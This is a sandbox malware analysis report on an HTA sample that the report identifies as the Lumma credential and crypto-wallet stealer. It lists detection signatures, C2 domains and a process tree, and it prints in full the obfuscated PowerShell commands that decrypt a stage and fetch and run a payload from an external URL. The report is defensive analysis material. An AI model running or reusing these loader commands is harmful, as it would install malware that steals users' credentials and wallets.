Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
winwidgetshp.mp4.hta

Overview

General Information

Sample name:winwidgetshp.mp4.hta
Analysis ID:1579459
MD5:c3e71edf7d2e73d4d84837aceaac29c7
SHA1:ac74d41864ebc5faf280c49ef82027a47ef4cabf
SHA256:a732b675bdf1d9e1a25f8236f6c9dcb79e756a46bdfc84601c01932e1af1795b
Tags:FakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7064 cmdline: mshta.exe "C:\Users\user\Desktop\winwidgetshp.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F7A4C2B014C25A08F51C4F88F54AC90423E9054BC28B1315DD2E1A60D1391C76EED112CDC6F204754F5A5205EDE0E60452F5D8F99E50133A73E99D6E111610504CC3C2C332749FA5022F17C0BE5726446604D480D6F1CE03B718D3723525E2F713F6084FEDEE861F1C477451AAA4DE1C0C2CA11107A3D215341566A170DC382A4642BFA767DC00AF2A7DE717721F19583AC1E0AEDEED698700E2874EA1D5E5A307BDF5513CB550000C01A6C336844CAB950E01B1EA73586EC398AE12D51E7F1938D74FAA15E5FF538324B8D3A10819C846');$nSNd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((htXbx('725944504E776C5A7566715556526E70')),[byte[]]::new(16)).TransformFinalBlock($sMkL,0,$sMkL.Length)); & $nSNd.Substring(0,3) $nSNd.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1428 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1208 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "learningypr.click", "rapeflowwj.lat", "discokeyus.lat", "crosshuaht.lat", "aspecteirs.lat"], "Build id": "jMw1IE--bigJ"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.3505131784.00000000073C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 2656INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1893f7:$b1: ::WriteAllBytes(
        • 0x189c59:$b1: ::WriteAllBytes(
        • 0x5847:$s1: -join
        • 0xd4c5:$s1: -join
        • 0x44f1b:$s1: -join
        • 0x45bd1:$s1: -join
        • 0x4d1ca:$s1: -join
        • 0x4dfe8:$s1: -join
        • 0x6904a:$s1: -join
        • 0x6a9c6:$s1: -join
        • 0x6b7e4:$s1: -join
        • 0x72358:$s1: -join
        • 0x73176:$s1: -join
        • 0x92afe:$s1: -join
        • 0x9392b:$s1: -join
        • 0x94970:$s1: -join
        • 0xabc46:$s1: -join
        • 0xd9de0:$s1: -join
        • 0xe6eb5:$s1: -join
        • 0xea287:$s1: -join
        • 0xea939:$s1: -join
        Process Memory Space: powershell.exe PID: 1428JoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
          Process Memory Space: powershell.exe PID: 1428INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x3bd1b:$b2: ::FromBase64String(
          • 0xa7a25d:$b2: ::FromBase64String(
          • 0xbd7e79:$b2: ::FromBase64String(
          • 0x9b6f:$s1: -join
          • 0x15aa9:$s1: -join
          • 0x3b92f:$s1: -join
          • 0x13816d:$s1: -join
          • 0xa79e71:$s1: -join
          • 0xadc4e0:$s1: -join
          • 0xae95b5:$s1: -join
          • 0xaec987:$s1: -join
          • 0xaed039:$s1: -join
          • 0xaeeb2a:$s1: -join
          • 0xaf0d30:$s1: -join
          • 0xaf1557:$s1: -join
          • 0xaf1dc7:$s1: -join
          • 0xaf2502:$s1: -join
          • 0xaf2534:$s1: -join
          • 0xaf257c:$s1: -join
          • 0xaf259b:$s1: -join
          • 0xaf2deb:$s1: -join
          Process Memory Space: powershell.exe PID: 1208JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            6.2.powershell.exe.73c0000.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = 